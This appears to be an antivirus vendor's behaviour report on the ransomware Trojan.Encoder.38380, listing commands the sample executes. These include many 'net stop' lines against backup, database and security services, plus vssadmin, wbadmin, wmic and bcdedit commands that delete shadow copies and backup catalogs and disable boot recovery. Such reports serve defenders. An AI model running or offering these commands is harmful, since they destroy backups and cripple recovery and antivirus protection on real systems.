Trojan.Encoder.38380

Technical Information

Malicious functions

To complicate detection of its presence in the operating system,

blocks execution of the following system utilities:

Windows Defender

deletes volume shadow copies.

Executes the following

'%WINDIR%\syswow64\net.exe' stop avpsus /y
'%WINDIR%\syswow64\net.exe' stop MSSQLServerADHelper100 /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$KAV_CS_ADMIN_KIT /y
'%WINDIR%\syswow64\net.exe' stop MySQL57 /y
'%WINDIR%\syswow64\net.exe' stop FishbowlMySQL /y
'%WINDIR%\syswow64\net.exe' stop SQLWriter /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$VEEAMSQL2012 /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$VEEAMSQL2012 /y
'%WINDIR%\syswow64\net.exe' stop ##WID /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$MICROSOFT /y
'%WINDIR%\syswow64\net.exe' stop dbeng8 /y
'%WINDIR%\syswow64\net.exe' stop dbsrv12 /y
'%WINDIR%\syswow64\net.exe' stop vmware-converter /y
'%WINDIR%\syswow64\net.exe' stop vmware /y
'%WINDIR%\syswow64\net.exe' stop tomcat6 /y
'%WINDIR%\syswow64\net.exe' stop msmdsrv /y
'%WINDIR%\syswow64\net.exe' stop FCS /y
'%WINDIR%\syswow64\net.exe' stop QuickBooks /y
'%WINDIR%\syswow64\net.exe' stop QLADHLP /y
'%WINDIR%\syswow64\net.exe' stop Intuit /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$KAV_CS_ADMIN_KIT /y
'%WINDIR%\syswow64\net.exe' stop msftesql /y
'%WINDIR%\syswow64\net.exe' stop MVArmor /y
'%WINDIR%\syswow64\net.exe' stop bedbg /y
'%WINDIR%\syswow64\net.exe' stop backup /y
'%WINDIR%\syswow64\net.exe' stop mepocs /y
'%WINDIR%\syswow64\net.exe' stop memtas /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$ /y
'%WINDIR%\syswow64\net.exe' stop MSSQL /y
'%WINDIR%\syswow64\net.exe' stop svc$ /y
'%WINDIR%\syswow64\net.exe' stop vss /y
'%WINDIR%\syswow64\net.exe' stop AcrSch2Svc /y
'%WINDIR%\syswow64\net.exe' stop QBVSS /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$SHAREPOINT /y
'%WINDIR%\syswow64\net.exe' stop SQLAgent$SBSMONITORING /y
'%WINDIR%\syswow64\net.exe' stop MSSQLFDLauncher$SBSMONITORING /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SHAREPOINT /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$SBSMONITORING /y
'%WINDIR%\syswow64\net.exe' stop MSSQL$MICROSOFT##SSEE /y
'%WINDIR%\syswow64\net.exe' stop Exchange /y
'%WINDIR%\syswow64\net.exe' stop sqlbrowser /y
'%WINDIR%\syswow64\net.exe' stop Culserver /y
'%WINDIR%\syswow64\net.exe' stop sqladhlp /y
'%WINDIR%\syswow64\net.exe' stop stc_raw_agent /y
'%WINDIR%\syswow64\net.exe' stop zhudongfangyu /y
'%WINDIR%\syswow64\net.exe' stop YooBackup /y
'%WINDIR%\syswow64\net.exe' stop YooIT /y
'%WINDIR%\syswow64\net.exe' stop QBCFMonitorService /y
'%WINDIR%\syswow64\net.exe' stop Intuit.QuickBooks.FCS /y
'%WINDIR%\syswow64\net.exe' stop QBIDPService /y
'%WINDIR%\syswow64\net.exe' stop QBFCService /y
'%WINDIR%\syswow64\net.exe' stop RTVscan /y
'%WINDIR%\syswow64\net.exe' stop ccSetMgr /y
'%WINDIR%\syswow64\net.exe' stop ccEvtMgr /y
'%WINDIR%\syswow64\net.exe' stop DefWatch /y
'%WINDIR%\syswow64\net.exe' stop NetBackup BMR MTFTP Service /y
'%WINDIR%\syswow64\net.exe' stop BMR Boot Service /y
'%WINDIR%\syswow64\net.exe' stop mfewc /y
'%WINDIR%\syswow64\net.exe' stop McAfeeDLPAgentService /y
'%WINDIR%\syswow64\net.exe' stop VeeamTransportSvc /y
'%WINDIR%\syswow64\net.exe' stop VeeamDeploymentService /y
'%WINDIR%\syswow64\net.exe' stop VSNAPVSS /y
'%WINDIR%\syswow64\net.exe' stop VeeamNFSSvc /y
'%WINDIR%\syswow64\net.exe' stop sqlagent /y
'%WINDIR%\syswow64\net.exe' stop veeam /y
'%WINDIR%\syswow64\net.exe' stop Sqlservr /y
'%WINDIR%\syswow64\net.exe' stop SavRoam /y
'%WINDIR%\syswow64\net.exe' stop mysql57
'%WINDIR%\syswow64\net.exe' stop -n apache24
'%WINDIR%\syswow64\net.exe' stop sophos /y
'%WINDIR%\syswow64\net.exe' stop CAARCUpdateSvc /y
'%WINDIR%\syswow64\net.exe' stop CASAD2DWebSvc /y
'%WINDIR%\syswow64\net.exe' stop sql /y
'%WINDIR%\syswow64\net.exe' stop MVarmor64 /y
'%WINDIR%\syswow64\net.exe' stop BackupExecRPCService /y
'%WINDIR%\syswow64\net.exe' stop BackupExecManagementService /y
'%WINDIR%\syswow64\net.exe' stop BackupExecJobEngine /y
'%WINDIR%\syswow64\net.exe' stop BackupExecDiveciMediaService /y
'%WINDIR%\syswow64\net.exe' stop BackupExecAgentBrowser /y
'%WINDIR%\syswow64\net.exe' stop BackupExecAgentAccelerator /y
'%WINDIR%\syswow64\net.exe' stop BackupExecVSSProvider /y
'%WINDIR%\syswow64\net.exe' stop PDVFSService /y
'%WINDIR%\syswow64\net.exe' stop AcronisAgent /y
'%WINDIR%\syswow64\net.exe' stop ARSM /y

Launches a large number of processes

Terminates or attempts to terminate

the following user processes:

firefox.exe

Modifies file system

Creates the following files

%APPDATA%\microsoft\windows\templates\hrdb.ico

Miscellaneous

Creates and executes the following

'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete catalog -quiet' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /C sc delete VSS
'%WINDIR%\syswow64\net1.exe' stop sophos /y
'%WINDIR%\syswow64\net1.exe' stop VeeamDeploymentService /y
'%WINDIR%\syswow64\net1.exe' stop VeeamNFSSvc /y
'%WINDIR%\syswow64\net1.exe' stop AcronisAgent /y
'%WINDIR%\syswow64\net1.exe' stop VeeamTransportSvc /y
'%WINDIR%\syswow64\net1.exe' stop -n apache24
'%WINDIR%\syswow64\net1.exe' stop Culserver /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecRPCService /y
'%WINDIR%\syswow64\net1.exe' wrapper
'%WINDIR%\syswow64\net1.exe' stop AcrSch2Svc /y
'%WINDIR%\syswow64\net1.exe' stop VSNAPVSS /y
'%WINDIR%\syswow64\net1.exe' stop veeam /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecManagementService /y
'%WINDIR%\syswow64\net1.exe' stop sqlbrowser /y
'%WINDIR%\syswow64\net1.exe' stop CASAD2DWebSvc /y
'%WINDIR%\syswow64\net1.exe' stop msftesql /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$MICROSOFT /y
'%WINDIR%\syswow64\net1.exe' stop FishbowlMySQL /y
'%WINDIR%\syswow64\net1.exe' stop sqladhlp /y
'%WINDIR%\syswow64\net1.exe' stop MSSQL$VEEAMSQL2012 /y
'%WINDIR%\syswow64\net1.exe' stop Sqlservr /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecJobEngine /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecAgentBrowser /y
'%WINDIR%\syswow64\net1.exe' stop zhudongfangyu /y
'%WINDIR%\syswow64\net1.exe' stop BackupExecAgentAccelerator /y
'%WINDIR%\syswow64\net1.exe' stop Intuit.QuickBooks.FCS /y
'%WINDIR%\syswow64\cmd.exe' /C wbadmin delete catalog -quiet
'%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
'%WINDIR%\syswow64\cmd.exe' /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
'%WINDIR%\syswow64\net1.exe' stop McAfeeDLPAgentService /y
'%WINDIR%\syswow64\net1.exe' stop BMR Boot Service /y
'%WINDIR%\syswow64\net1.exe' stop avpsus /y
'%WINDIR%\syswow64\net.exe' top SavRoam /y
'%WINDIR%\syswow64\net1.exe' stop mfewc /y
'%WINDIR%\syswow64\net1.exe' stop ccEvtMgr /y
'%WINDIR%\syswow64\sc.exe' delete VSS
'%WINDIR%\syswow64\net1.exe' stop NetBackup BMR MTFTP Service /y
'%WINDIR%\syswow64\net1.exe' stop ccSetMgr /y
'%WINDIR%\syswow64\net1.exe' stop QBIDPService /y
'%WINDIR%\syswow64\net1.exe' stop DefWatch /y
'%WINDIR%\syswow64\net1.exe' stop QBFCService /y
'%WINDIR%\syswow64\net1.exe' stop QBCFMonitorService /y
'%WINDIR%\syswow64\net.exe' wrapper
'%WINDIR%\syswow64\net.exe' DefWatch
'%WINDIR%\syswow64\net1.exe' stop YooBackup /y
'%WINDIR%\syswow64\net1.exe' top SavRoam /y
'%WINDIR%\syswow64\net1.exe' stop YooIT /y
'%WINDIR%\syswow64\net1.exe' stop RTVscan /y
'%WINDIR%\syswow64\net1.exe' stop mysql57
'%WINDIR%\syswow64\net1.exe' stop BackupExecVSSProvider /y

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial